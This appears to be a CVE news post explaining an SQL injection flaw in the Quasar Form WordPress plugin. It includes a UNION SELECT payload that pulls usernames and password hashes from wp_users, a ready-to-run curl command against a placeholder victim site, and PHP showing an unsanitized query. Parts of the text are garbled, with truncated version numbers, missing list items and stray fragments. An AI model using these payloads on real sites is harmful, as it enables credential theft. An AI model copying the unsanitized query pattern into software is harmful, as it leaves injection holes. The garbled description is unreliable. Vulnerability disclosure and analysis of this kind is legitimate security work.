CVE CyberSecurity Database News

CVE-2023-35910 - SQL Injection Vulnerability in Quasar Form Free WordPress Plugin (Explained + Exploit)

Poster -

WordPress is the backbone of millions of websites, which also means that vulnerabilities in its plugins can have massive consequences. One such issue is CVE-2023-35910, an SQL Injection flaw found in the popular Quasar form free – Contact Form Builder for WordPress plugin, versions up to 6.. This “improper neutralization of special elements” bug can let an attacker run arbitrary SQL queries on the site’s database, potentially stealing, altering, or deleting sensitive content.

In this post, we’ll break down the vulnerability, show a proof of concept exploit, and offer advice on mitigation.

[References](#references)

6. [How to Fix / Protect](#how-to-fix--protect)

What is SQL Injection?

SQL Injection (SQLi) happens when user input is mistakenly merged into SQL queries without careful sanitizing (cleaning), allowing hackers to tweak those queries and potentially control the database. With SQLi, attackers can:

Vulnerable Feature: Form submission processing

Source / Download Page: https://wordpress.org/plugins/quasar-form/

How Does CVE-2023-35910 Happen?

When a website user fills out a contact form powered by the Quasar plugin, the form data is passed to the server. Normally, this should be cleaned and validated before it's used in an SQL query. Due to improper neutralization (not properly handling special characters), attackers can inject malicious SQL via form fields like “name” or “email”.

Example vulnerable code (pseudo-code)

// BAD PRACTICE! Direct interpolation
$sql = "SELECT * FROM wp_qf_leads WHERE email = '" . $_POST['email'] . "'";

If an attacker enters this as their email:
' OR 1=1; --

the resulting SQL looks like this

SELECT * FROM wp_qf_leads WHERE email = '' OR 1=1; --'

Now, the query will return all leads, exposing your users.

Prerequisites

- A WordPress site with Quasar form free – Contact Form Builder version ≤ 6. installed and active.

Simple Exploit: Access Data

Let’s say the plugin processes the “message” input, and doesn’t sanitize it before including it in the database query. An attacker can submit a form like this:

Example payload for the “name” field

John' UNION SELECT user_login, user_pass, null FROM wp_users-- -

Sample cURL command to exploit

curl -X POST 'http://victim-site.com/contact-form'; \
  -d 'name=John%27%20UNION%20SELECT%20user_login,%20user_pass,%20null%20FROM%20wp_users--%20-' \
  -d 'email=innocent@example.com' -d 'message=hello'

*This submits the form as normal, but the “name” field now contains a SQL injection payload designed to read usernames and password hashes from the wp_users table.*

If the form is processed in a way that leaks the query result (e.g., via email notification, display on screen, or via debug logs), sensitive data like admin usernames and hashes can be exposed to the attacker.

Proof of Concept PHP (for educational purposes only!)

<?php
// . . . regular plugin code . . .
$name = $_POST['name']; // unsanitized
$email = $_POST['email'];
// Vulnerable query
$query = "INSERT INTO wp_qf_leads (name, email) VALUES ('$name', '$email')";
// If not sanitized, this allows injection!
mysql_query($query);
?>

Spamming and defacement

## How To Fix / Protect

UPDATE PLUGIN IMMEDIATELY

If a patch is available, install the latest version from the WordPress plugins page.

`

References

- NVD Entry for CVE-2023-35910
- Quasar Form Free Plugin, WordPress.org
- OWASP: SQL Injection Explained
- Original Disclosure / Patch Details

Conclusion

CVE-2023-35910 is a critical risk for any WordPress site using the Quasar form free plugin up to version 6.. SQL Injection can expose your users, your site, and your business. Patch your plugins, use best coding practices, and monitor for strange activity. As always, follow responsible disclosure and never exploit sites you do not own.

Timeline

Published on: 11/04/2023 00:15:08 UTC
Last modified on: 11/09/2023 20:10:03 UTC